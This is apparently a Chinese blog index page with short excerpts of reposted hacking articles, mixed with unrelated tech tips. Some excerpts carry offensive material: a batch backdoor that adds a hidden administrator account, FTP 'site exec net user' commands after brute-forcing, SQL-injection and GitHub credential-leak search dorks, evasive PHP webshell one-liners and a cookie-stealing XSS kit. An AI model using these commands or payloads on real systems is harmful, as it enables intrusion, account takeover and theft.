Metasploitable 2 漏洞演练系统使用指南 LOnils风迷 's Blog: 又是一篇翻译文,感觉国外大叔们真心不错~很早就看见这篇外文,感觉不错。结果就有人翻译出来了。。。比鸟文好看=。= ==== 翻译by:月巴_又鸟 今天要给大家介绍的是Metasploitable漏洞演练系统,他的作用是用来作为MSF攻击用的靶机,他是一个具有无数未打补丁漏洞与开放了无数高危端口的渗透演练系统,在这里,猥琐的黑阔们可以尽情地想出各种淫荡的思路对这个渗透演练系统进行攻击,当一个猥琐的思路不行时你马上可以换一个新的猥琐思路,这也是”回溯(backtarck)”的精髓吧! 废话不多说,马上进入正题( ̄▽ ̄): 系...   2018年6月29日 22  
详解Telnet入侵原理及利用方法(精华) 陌安-----专注追梦: 1、什么是Telnet?  对于Telnet的认识,不同的人持有不同的观点,可以把Telnet当成一种通信协议,但是对于入侵者而言,Telnet只是一种远程登录的工具。一旦入侵者与远程主机建立了Telnet连接,入侵者便可以使用目标主机上的软、硬件资源,而入侵者的本地机只相当于一个只有键盘和显示器的终端而已。2、Telnet被入侵者用来做什么  (1)Telnet是控制主机的第一手段  如果入侵者想要在远程主机上执行命令,需要建立IPC$连接,然后使用net time命令查看系统时间,最后使用at命令建立计划任务才能完成远程执行命令。虽然这种方法能够远程执行命...   2018年4月11日 8  
php实现获取局域网所有用户的电脑IP和主机名、及mac地址完整实例 第叁人稱: ?php $bIp= gethostbyname($_ENV['COMPUTERNAME']); //获取本机的局域网IP echo本机IP:,$bIp,\n; echo本机主机名:,gethostbyaddr($bIp),\n\n\n; //gethostbyaddr 函数可以根据局域网IP获取主机名 //默认网关IP list($ipd1,$ipd2,$ipd3) = explode('....   2018年4月11日 2  
php需要注意的危险函数 黑客博客-阿城's Blog: 有时候为了安全我们需要禁掉一些PHP危险函数,整理如下需要的朋友可以参考下 phpinfo() 功能描述:输出 PHP 环境信息以及相关的模块、WEB 环境等信息。 危险等级:中 passthru() 功能描述:允许执行一个外部程序并回显输出,类似于 exec()。 危险等级:高 exec() 功能描述:允许执行一个外部程序(如 UNIX Shell 或 CMD 命令等)。 危险等级:高 system() 功能...   2017年9月15日 3  
Winows后门及代码总汇(提权及服务器维护必学) 陌安 ' Blog: 组策略欺骗后门 创建一个批处理文件add.bat,内容是: @echo off net user hack$ test168 /add net localgroup administrators hack$ /add exit (2)利用   上传运行gpedit.msc,定位到“计算机配置一Windows设置一脚本(启动/关机)”, 双击右边窗口的“关机”,在其中添加add.bat。   这样就实现了当系统关机时创建hack$用户,...   2017年9月7日 4  
流氓电脑管家-劫持用户浏览器主页 电脑管家就是个坑 中国8090小组- ‘ 钊涣: 如何找出百度网址后缀被篡改的真正凶手! 作者:钊涣前言: 我们有时候上网会发现浏览器主页后缀总有些奇怪的字符id。检查了主页地址,明明锁定地址了..但是还是会出现。其实这些都是第三方软件使用的 主页导航赚佣金推广。这种情况使用杀毒软件查杀都是无济于事的。绝大多数用户都信赖杀毒软件,却不知道xxx杀毒软件暗藏恶意利用了用户.. 今天我就带大家一步步找出 篡改主页导航后缀的真正元凶! 被劫持的主页: 检查验证:...   2017年3月20日 4  
发布了长文章:点击查看Hello building~:发布了长文章:《 一道关于重置密码逻辑漏洞的CTF题 》   2017年3月20日 2  
Discuz论坛完美搬家 详细分享我的DZ搬家步骤 中国8090小组- ‘ 钊涣: 由于论坛的迅速发展,普通的虚拟主机已经承受不住了,想要换成云服务器,却又不懂得如果搬家。通过网络以及网站客服的查询帮助,亲手实现了Discuz完美搬家。我在搬家时截了每个步骤的图,今天写下这篇文章,为大家详细解说一下。其实网站要搬家有好几种方法,但是要求完美搬家的话,就不没那么多了。很多人都在用帝国备份王进行数据库的备份,自我感觉帝国备份王确实要比dz后台的备份安全可靠得多。但出于大家都是新手,当然是要采取最简单的搬家方法。我这里给大家分享...   2017年1月5日 2  
PHP文件上传验证 F0rg3t's Blog: ?php var_dump($_FILES); //开始判断错误号 $error = $_FILES['upload']['error']; var_dump($error); switch($error){ case 1: exit('上传的文件超过了限制'); break; case 2: exit('上传的文件超过了表单提交的最大值'); break; case 3: exit('文件只有部分被上传'); break; case 4: exit('没有文件被上传');...   2016年9月26日 2  
USB Kill v2.0,一个可以瞬间烧毁电脑或平板的“U盘” 中国8090小组- ‘ 钊涣: 前传 故事还要从一个名叫“KillerUSB(U盘杀手)”的U盘驱动器说起。在很多科幻题材的电影中,黑客可以通过远程操作来“引爆”某一台计算机,并通过这样的方式杀掉目标人物。这种事情真的只存在于电影中吗?在我回答这个问题之前,我想先给各位介绍这款名为KillerUSB的U盘驱动器: 有一位帅哥走进了地铁站,然后从别人背包的外边口袋里摸出了一个USB闪存盘。毫无疑问,他将其放进了自己的口袋。回到家之后,他拿出了这个U盘,并发现上面写着“128”。接下来的事情大家也能猜到,好奇心驱使他把这个偷...   2016年9月26日 3  
服务器冷门端口:65500爆破检测手工提权 Stephen: 大家好,今天教大家如何进行远程爆破 打开一款扫描器,输入扫描参数,端口填写65500 这是扫描到的IP地址 新建一个TXT文本,将这些IP地址复制到文本里,打开爆破器,将保存的IP地址导入进去,爆破口令,线程默认就好,然后开始 爆破出来的 账号:go 密码:od 用CMD连接 命令 ftp Open ip 65500 用户名:go 密码:od quote site exec net user 123 123 @QQ.com/add ...   2016年8月14日 2  
值得提醒的手机安全问题——手机搭建的ftp服务器 在这个互联网飞速发展的时代,智能手机已经成为了人类不可或缺的一部分,在智能手机没有问世之前,最让人头疼的网络安全问题大部分是来自计算机。而智能手机机出现后,手机的安全问题也随之而生,首先是泄密,然后是垃圾广告,扣费病毒等等,可这些安全问题似乎对我们的威胁不是特别大。想像一下,如果今后出现一款超级手机病毒,它不仅可以窃取你的联系人等隐私、盗取银行密码,甚至可以远程操控你的手机,随时启动你的摄像头、在你的手机中安装病毒程序,而且感染其他文件,导致手机不能正常使用,甚至系统损坏,。。那将会是什么样的世界。。 内行的人都知道,安卓手机是可以开启FTP服...   2016年8月7日 1  
MetInfo5.2.X-5.3.X盲注脚本(二分法) ☯KK | I AM KK: #coding=utf-8 __author__ = '小亭KK---http://molok.lofter.com' import requests headers = { 'User-Agent': 'Mozilla/5.0 Chrome/28.0.1500.63' } keyword = '2013-12-26'#设置判断返回结果差异的关键字,可根据实际情况修改 datalength ...   2016年6月28日 4  
【安全预警】Forbidden attack:7万台web服务器陷入被攻击的险境 中国8090小组- ‘ 钊涣: 最近,根据某国际安全小组的研究表明,金融巨头Visa旗下部分受HTTPS保护的网站最近被发现了一种漏洞,它的存在可以让黑客注入恶意代码,访客浏览器将会访问到恶意内容。加密重用造成的Forbidden Attack 据统计,受影响一共有184台服务器,其中部分属于德国证券交易所(Deutsche Börse)和波兰银行协会(Zwizek Banków Polskich),它们被发现容易受到某加密技术漏洞的攻击,我们称之为“Forbidden Attack”。此外,还有7万台web服务器被发现...   2016年6月11日 1  
技术分享:WIFI钓鱼的入门姿势 中国8090小组- ‘ 钊涣: 简介 该实验先是搭建一个测试环境,然后创建一个假的无线接入点,把网络连接连接到假的接入点并且强迫用户连接假的无线点。事先准备 1.无线网卡:无线网卡用于数据包的嗅探和注入。 2. Backtrack或者Kali Linux: 攻击平台 3.无线网络:确保该无线由用户使用,并且能控制这个无线接入点。 4.一个目标机器:这个机器可以是你的物理机或者虚拟机。本次实验中用到的是Windows 7 虚拟机开始实验:创建一个流氓接入点 第一步: 启动...   2016年5月16日 5  
Github文件泄露搜索语法 ☯Soul-WebSecPenTest: 邮件信息:site:Github.com smtpsite:Github.com smtp @qq.comsite:Github.com smtp @126.comsite:Github.com smtp @163.comsite:Github.com smtp @sina.com.cnsite:Github.com smtp passwordsite:Github.com String password smtp…… 结合厂商域名,灵活运用:site:Github.com smtp @厂商域名 搜索XX公司内部信息:site...   2016年4月28日 8  
AMD Crimson16.3驱动下载!游戏性能飙增60% 中国8090小组- ‘ 钊涣: 现在AMD和NVIDIA发驱动的节奏是越来越同步了,几乎是谁家新驱动一发布,另一家就会快速跟进。当然,客观来讲,与其说是竞争策略,不如说是游戏的影响,也就是大家的步调实际上是和近一段的新作优化有关。 今天,AMD也放出了全新的Crimson新驱动,软件版本号16.3(驱动版本号16.15),本次优化的主力对象是即将于明天上架的SE社《杀手6》新作,包括对交火的性能改善。 同时,本次驱动也改善了《公园The Park》、《古墓丽影10》、《战争机器终极版》的游戏体验,其中Fury X在《古墓》提升16%,《战争机器》中Fury...   2016年4月8日 1  
BAT编程,自制垃圾清理器 在此之前,你需要新建一个文本文档然后把下面的代码复制到文本文件中,然后把 .txt 的后缀改成 .bat 完成后双击它即可运行。 --------------------------------------------------------------------------------------------------------------------------------------------------------- echo 薯片哥正在帮你清理系统盘中的垃圾文件... color 0a del /f /s...   2016年4月3日 1  
[原创]bat为SQLMap添加系统环境变量 M0L0K's Blog—关注网络安全与渗透测试~: 把以下code保存为1.bat ,随后双击运行即可: ::添加环境变量sqlmap@echo offecho 添加sqlmap环境变量path 把这里替换成你的SQLMAP文件夹路径;%path%set tmp=%path%reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment /v Path /t REG_SZ...   2016年4月1日 5  
win7去除快捷方式小箭头 实用 中国8090小组- ‘ 钊涣: ----------------------------------------------------------------------运行 cmd /k reg delete HKEY_CLASSES_ROOT\lnkfile /v IsShortcut /f taskkill /f /im explorer.exe start explorer.exe 就可以了,只要一秒钟。 ----------------------...   2016年3月25日 1  
新漏洞使黑客劫持无线键盘和鼠标 中国8090小组- ‘ 钊涣: 今天我们发现了一个重大漏洞,该漏洞可能将数以百万计的使用无线键盘和鼠标的系统置于危险之中。这个漏洞被称为“MouseJack”,黑客可以在距离最远100米(328英尺)的地方用15美元的 USB加密狗发送任意指令到目标电脑。 首先是好消息:该漏洞不会影响蓝牙设备,其中包括了很多普遍使用的无线设备。而坏消息是:几乎所有受影响的无线键盘和鼠标都不堪一击,根据发现MouseJack的安全公司Bastille的信息,其中包括微软、罗技、联...   2016年3月19日 1  
  2016年2月26日  
如何成为一个的web安全工程师-梦想 M0L0K's Blog—关注网络安全与渗透测试~: ch1st --代码审计,web安全: 一.做安全的三个起点: 1.可以无学历,但是绝对要比别人付出三倍的努力 2.人可以高调,但是在技术方面必须虚心 3.你可以没有女朋友,但是你必须有梦想 web-security-web-monitoring-web-filtering.jpg 二.写的了代码,懂的了原理 1.在码农与web安全工程师的之间的鸿沟就是码农一门语言行走天下,但是web安全工程师就要懂,代码,安全,运维这三方面,这也是一个创业公司愿意招的人的类型,首先例如php...   2016年2月14日 11  
wooyun乌云爬虫及搜索系统架设教程 M0L0K's Blog—关注网络安全与渗透测试~: wooyun爬虫及搜索 wooyun.org bug search 1.相关组件 Python (建议2.7) pipmongodbscrapyFlaskpymongo 1、安新环境,安装比较麻烦,需要一定的Linux基础,大概安装过程 安装Scrapy http://www.hx99.net/OS/Linux/201601/37095.html 安装MongoDB 2.6 http://blog.csdn.net/chszs/article/...   2016年2月10日 10  
  2016年1月30日  
基于错误回显的SQL注入笔记 M0L0K's Blog—关注网络安全与渗透测试~: 0x00 关于错误回显     用我自己的话来讲,基于错误回显的sql注入就是通过sql语句的矛盾性来使数据被回显到页面上(当然在实际应用中得能回显在页面上,一般的网站都回避免这种情况,哈哈,要是能碰上你就偷着乐吧)。 0x01 用于错误回显的sql语句(下面的函数撸主只在mysql下试过也能成功,其他数据库有待考证,待有实例的时候会补充) 第一种: 基于 rand() 与 group by 的错误     首先看一下关于rand...   2016年1月23日 4  
webshell提权服务器20种方法 Mr.X 's Blog|关注网络安全: 1,SER-TU提权(通常是利用SERFTP服务器管理工具,首先要在安装目录下找到INI配置文件,必须具备可写入的权限)2,RADMIN提权(大家并不陌生,我们在扫描4899空口令后,同样需要他来连接)3,PCANYWHRER提权(也是远程客户端软件,下载安装目录的CIF文件进行破解)4,SAM提权(SAM系统帐户,通常需要下载临时存放的SAM文件,然后进行HASH破解)5,NC提权(利用NC命令,反弹一个端口,然后TELNET远程去连接一个端口,虽然权限不够大,结合巴西烤肉,能够成功的)6,PR提权(PR提权,这个就不多说了,最好是免杀的PR...   2016年1月23日 3  
C段渗透攻击必看的技术知识 ╰ァBy﹎冰客: 假设想攻击的主机IP是:61.139.1.79 同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆 第一步: tracert 61.139.1.1 C:\WIN2000\system32tracert 61.139.1.1 Tracing route to HACK-4FJ7EARC [61.139.1.1] over a maximum of 30 hops:...   2016年1月23日 10  
phpshe后台任意文件删除(后台无限制拿shell) case 'del': pe_token_match(); $tpl_name = pe_dbhold($_g_tpl); if ($tpl_name == 'default') pe_error('默认模板不能删除...'); ...   2016年1月22日  
过狗过盾无特征无动态函数PHP一句话 分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等) 原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html所有一句话使用方法基本都是:http:// target/shell.php?e=assert 密码pass 分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等) 原理:https...   2016年1月22日  
BeEF+MSF拿内网主机 M0L0K's Blog—关注网络安全与渗透测试~: 用到的工具:beEF+msf 利用的IE漏洞:MS12-063 先配置下: root@kali:~# cd /usr/share/beef-xss/root@kali:/usr/share/beef-xss# lsbeef beef_key.pem config.yaml db Gemfile modulesbeef_cert.pem bundle core extensions Gemfile.lock 编辑下config.yaml 把metasploit :false改成true ...   2016年1月1日 9  
分享自己写的XSS源码(适合自用) M0L0K's Blog——关注网络安全与渗透测试~: 这个是自己写的一款XSS源码~ 仅需要两个文件~ 仅有获取cookie的简单功能~ 获取数据直接写文件输出表格~ 项目地址:http://git.oschina.net/molok/M0L0K_XSS 使用前先Get提交:http://127.0.0.1/=_=.php?sub=ko,创建一个主题表格! Get提交:http://127.0.0.1/=_=.php?del=ko,即可清空所有获取的数据~ 使用方式: 在含有XSS漏洞的页面插入 ...   2015年12月19日 6 1  
Woobuntu——开源中文白帽桌面系统 M0L0K's Blog——关注网络安全与渗透测试~: Wooyun + Ubuntu = Woobuntu Woobuntu是基于Ubuntu系统的一款安全研究环境配置工具,可以自动安装并配置众多的安全工具与依赖环境,此外还针对中国用户的习惯进行了一些优化,可以为白帽子们提供更加优雅的桌面系统体验。Woobuntu完全开源免费,并且保留了Ubuntu的全部特性。0x00 从kali说起 对于绝大多数白帽子而言,目前最好的渗透测试Linux系统是kali linux(之前的Backtrack Linux),我也一直在用Kali来进行各种工作。但是作为一个中国人,不得...   2015年12月12日 4  
  2015年11月25日 2  
教你把Windows 95装进智能手表里 中国黑客俱乐部: 0851 TeAm: 1、安装ADB。ADB是一个让开发者在手机上调试Android应用的程序。Windows用户可以使用这个工具来安装,针对Mac和Linux,Corbin开发了一个名为Nexus Tools的安装工具。2、打开调试模式。先在Android手机上打开USB调试(如果无法打开,请到设置-关于手机,连续点击版本号);接着在智能手表上打开调试模式,打开设置-关于并连续点击版本号,然后到开发者选项中点击“ADB Debugging”(ADB调试)和“Debugging over Bluetooth”(蓝牙调试)。之后它会显示“Host:disconnected...   2015年11月17日 2  
ElasticSearch Groovy脚本远程代码执行漏洞 中国黑客俱乐部: Hack L0s4r's Blog - 黑客博客,黑客笔记.: ElasticSearch的这个漏洞的编号是CVE-2015-1427,影响版本为1.3.0-1.3.7以及1.4.0-1.4.2,漏洞成因详见:http://drops.wooyun.org/papers/5107,本文具体探讨一下漏洞利用。1.2.0版本默认是禁用了脚本执行,如果要使用该功能的话,要在elasticsearch.yml中设置script.disable_dynamic:true。在1.3.0版本,开始使用groovy和sandbox来进行脚本执行,其中使用了白名单...   2015年11月17日 2  
计算机BIOS报警声分析 BB是报警的声音 你可以根据报警声音长短,数目来判断问题出在什么地方AWARD BIOS响铃声的一般含义是: 1短: 系统正常启动。这是我们每天都能听到的,也表明机器没有任何问题。 2短: 常规错误,请进入CMOS Setup,重新设置不正确的选项。 1长1短: RAM或主板出错。换一条内存试试,若还是不行,只好更换主板。 1长2短: 显示器或显示卡错误。 1长3短: 键盘控制器错误。检查主板。 ...   2015年11月14日  
100个SQL渗透关键字 inurl:index.php?id=inurl:trainers.php?id=inurl:buy.php?category=inurl:article.php?ID=inurl:lay_old.php?id=inurl:declaration_more.php?decl_id=inurl:ageid=inurl:games.php?id=inurl:age.php?file=inurl:newsDetail.php?id=inurl:gallery.php?id=inurl:article.php?id=inurl:show.php?id=inurl:staff_id=inurl:newsitem...   2015年11月14日  
开启3389端口指令 cmd命令行开启3389端口 reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /freg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f执行以上两条命令,开启3389端口。也可以将这两条做成bat   2015年11月14日  
21种提升权限的方法 晴云孤魂's Blog: 1.radmin连接法条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去。本人从来没成功过,端口到是给对方打开了。2.paanywhereC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 这里下他的GIF文件,在本地安装pcanywhere上去。3.SAM破解C:\WINNT\system32\config\ 下他的SAM 破解之。4.SU密码夺取C:\Documents and Settings\All Users...   2015年11月11日 1  
给自己的cmd命令提示窗口加上密码 中国8090小组- ‘ 钊涣: 现在黑客入侵日渐猖獗,防止黑客进行提权我们的服务器,就有必要做一些安全措施。 网站服务器的话一定置C盘权限很多朋友忽略了C盘下的回收站的权限,当然如果设置成不可写权限的话我们没有办法删除文件的。 如果服务器不是经常,建议大家还是设置为可读不可写 一般情况下回收站目录 c:\recycler\ 还是有就是系统临时文件夹:C:\WINDOWS\Temp 给cmd加上密码不仅能够更加美观且也能够有效的防止cmd文件被利用 如果担心...   2015年9月26日 1  
  2015年9月12日  
怎么看网站有没开启CDN 测试网站全国访问速度方法 中国8090小组- ‘ 钊涣: 怎么看网站有没开启CDN? 要看一个网站是否开启CDN,方法很简单,只要在不同的地区ping网址就可以,比如在山东济南ping www.pc841.com 得到的IP地址是111.161.66.167,但在江苏地区ping www.pc841.com得到的IP确是61.147.92.111,像这样在不同地区ping同一个网址,得到不同的IP地址,那么这种情况就可以判断该网站开了CDN加速。 如果网站没有开启CDN,不同地区Ping网址是网站服务器的真实地址,如果开启了CDN加速,网站内容会缓存到各地区离你最近的服...   2015年9月12日 1  
8090小组之《Windows功防》 开两台虚拟机模拟入侵 中国8090小组- ‘ 钊涣: 我设置乙的管理密码为123 账户还是默认的 administrator 然后用甲的x-scan 扫描乙一共开了哪些系统服务 和或口令登陆 不到10秒就扫到了乙的管理密码为123 然后x-scan提示我乙电脑的139开着。。密码是123 是server nt服务 然后我就想到139和445都是连着ipc$会话的。。我立马用net use \\这里是对方局域网的ip\ipc$ 对方管理密码也就是:123 /user:这里填用户名也就是administrator 连接成功- -然后用net use S: \\ip...   2015年9月12日 1  
  2015年9月12日  
 

© 千秋雪 | Powered by LOFTER